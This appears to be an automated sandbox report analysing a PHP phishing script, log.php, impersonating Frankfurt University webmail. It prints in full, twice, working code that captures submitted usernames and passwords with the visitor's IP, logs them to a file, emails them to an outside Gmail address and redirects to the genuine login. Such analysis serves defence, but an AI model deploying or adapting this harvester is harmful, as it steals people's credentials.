PHP Malware Analysis

log.php

md5: 31de5d0f718b5a0c57cb989faab49cf7

Jump to: 

Screenshot
Attributes
Emails

Input

URLs

Deobfuscated PHP code
<?php

$ip = getenv("REMOTE_ADDR");
$message .= "\n";
$message .= "Username\t: " . $_POST['username'] . "\n";
$message .= "Password\t: " . $_POST['password'] . "\n";
$message .= "\n";
$message .= "IP       : " . $ip . "\n";
$send = "sealion1414@gmail.com";
$fp = fopen("frankfurt.txt", "a");
fputs($fp, $message);
fclose($fp);
$subject = "mail.frankfurt-university.de - " . $_POST['username'] . "\n";
$headers = "from: DE <noreply@frankfurt-university.de";
$headers .= $_POST['eMailAdd'] . "\n";
$headers .= "MIME-Version: 1.0n";
mail("sealion1414@gmail.com", "{$subject}", $message);
header("Location:  https://webmail.frankfurt-university.de/");
?>
 
Execution traces
data/traces/31de5d0f718b5a0c57cb989faab49cf7_trace-1676245085.677.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:38:31.574778]
1	0	1	0.000156	393512
1	3	0	0.000199	393800	{main}	1		/var/www/html/uploads/log.php	0	0
1	3	1	0.000216	393800
			0.000242	314224
TRACE END   [2023-02-12 21:38:31.574897]


Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?
$ip = getenv("REMOTE_ADDR");
$message .= "\n";
$message .= "Username	: ".$_POST['username']."\n";
$message .= "Password	: ".$_POST['password']."\n";
$message .= "\n";
$message .= "IP       : ".$ip."\n";
$send = "sealion1414@gmail.com";
$fp = fopen("frankfurt.txt","a");
fputs($fp,$message);
fclose($fp);
$subject = "mail.frankfurt-university.de - ".$_POST['username']."\n";
$headers = "from: DE <noreply@frankfurt-university.de";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0n";
mail("$send", "$subject", $message); 
header("Location:  https://webmail.frankfurt-university.de/");	  

?>